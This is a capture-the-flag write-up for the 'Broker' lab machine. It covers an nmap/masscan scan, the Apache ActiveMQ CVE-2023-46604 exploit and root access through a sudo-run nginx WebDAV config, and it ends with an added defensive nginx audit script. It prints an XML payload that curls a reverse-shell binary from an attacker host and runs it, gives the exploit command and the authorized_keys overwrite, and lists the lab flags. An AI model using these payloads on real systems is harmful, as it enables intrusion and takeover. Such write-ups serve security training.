[Machines] [Easy] Broker: Apache ActiveMQ RCE + Nginx ngx_http_dav_module Privilege Escalation

Information Gathering

IP Address      Open Ports
10.10.11.243    TCP: 22, 80, 1883, 5672, 8161, 38507, 61613, 61614, 61616

$ ip='10.10.11.243'; itf='tun0'
$ if nmap -Pn -sn "$ip" | grep -q "Host is up"; then
      echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"
      # masscan all TCP/UDP ports, then hand the open ones to nmap for version/script scanning
      ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" \
              | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//')
      if [ -n "$ports" ]; then
          echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"
          nmap -Pn -sV -sC -p "$ports" "$ip"
      else
          echo -e "\e[31m[!] No open ports found on $ip.\e[0m"
      fi
  else
      echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"
  fi

PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3eea454bc5d16d6fe2d4d13b0a3da94f (ECDSA)
|_  256 64cc75de4ae6a5b473eb3f1bcfb4e394 (ED25519)
80/tcp    open  http       nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-server-header: nginx/1.18.0 (Ubuntu)
1883/tcp  open  mqtt
| mqtt-subscribe: 
|   Topics and their most recent payloads: 
|_    ActiveMQ/Advisory/Consumer/Topic/#: 
5672/tcp  open  amqp?
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie: 
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       Jetty 9.4.39.v20210325
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
|_http-server-header: Jetty(9.4.39.v20210325)
38507/tcp open  tcpwrapped
61613/tcp open  stomp      Apache ActiveMQ
| fingerprint-strings: 
|   HELP4STOMP: 
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       Jetty 9.4.39.v20210325
|_http-title: Site doesn't have a title.
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Jetty(9.4.39.v20210325)
61616/tcp open  apachemq   ActiveMQ OpenWire transport
| fingerprint-strings: 
|   NULL: 
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName 
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails 
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion 
|_    5.15.15

Apache ActiveMQ RCE (CVE-2023-46604)

$ wget https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ/archive/refs/heads/main.zip

<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
       http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
        <constructor-arg>
            <list>
                <value>sh</value>
                <value>-c</value>
                <!-- The command below downloads the payload from the attacker host as ./reverse, makes it executable and runs it -->
                <value>curl -s -o reverse http://10.10.16.28/reverse; chmod +x ./reverse; ./reverse</value>
            </list>
        </constructor-arg>
    </bean>
</beans>

$ go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.28:9999/poc-linux.xml

User.txt

a178c399b0c91839399aa5b98c0c117c

Privilege Escalation: Nginx ngx_http_dav_module

$ cat << EOF > /tmp/shell.conf
user root;
worker_processes 4;
pid /tmp/nginx.pid;

events {
    worker_connections 768;
}

http {
    server {
        listen 10031;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF

$ sudo nginx -c /tmp/shell.conf

$ ssh-keygen

$ curl -X PUT http://10.10.11.243:10031/root/.ssh/authorized_keys -d @/home/maptnh/.ssh/id_ed25519.pub

$ ssh root@10.10.11.243 -i /home/maptnh/.ssh/id_ed25519
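
As an added defender-side check, not part of the original writeup, the script below audits an nginx configuration for the combination of directives this escalation relies on (workers as root, WebDAV write methods, the filesystem root as document root, directory listing); it assumes the underlying misconfiguration is a sudo rule that lets a user start nginx with an arbitrary config file, and the sample it runs against is a constructed copy of the /tmp/shell.conf written above.

```shell
#!/bin/sh
# Added audit script (not from the writeup). Prints one "[!]" line per
# dangerous directive found and returns the number of findings (0 = clean).
audit_nginx_conf() {
    conf="$1"
    findings=0
    # Drop comments first so a commented-out directive does not count.
    stripped=$(sed 's/#.*$//' "$conf")
    _flag() {   # $1 = ERE to search for, $2 = message to print on a hit
        if printf '%s\n' "$stripped" | grep -Eq "$1"; then
            echo "[!] $conf: $2"
            findings=$((findings + 1))
        fi
    }
    _flag '^[[:space:]]*user[[:space:]]+root[[:space:]]*;' \
          'worker processes run as root (user root;)'
    _flag '^[[:space:]]*dav_methods[[:space:]]+[^;]*(PUT|DELETE|MKCOL|COPY|MOVE)' \
          'WebDAV write methods enabled (dav_methods)'
    _flag '^[[:space:]]*root[[:space:]]+/[[:space:]]*;' \
          'document root is the filesystem root (root /;)'
    _flag '^[[:space:]]*autoindex[[:space:]]+on[[:space:]]*;' \
          'directory listing enabled (autoindex on;)'
    return "$findings"
}

# Constructed sample: the config the writeup drops into /tmp/shell.conf.
SAMPLE_CONF=$(mktemp)
cat > "$SAMPLE_CONF" <<'EOF'
user root;
worker_processes 4;
pid /tmp/nginx.pid;
events { worker_connections 768; }
http {
    server {
        listen 10031;
        root /;
        autoindex on;
        dav_methods PUT;
    }
}
EOF

audit_nginx_conf "$SAMPLE_CONF" || echo "[!] $? dangerous directive(s) found"
```

Run it against every file a sudo rule allows nginx to load; a hit on any of the four checks is worth treating as a local privilege escalation path.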

Root.txt

26eecd6da62a87d2098e474929f93140
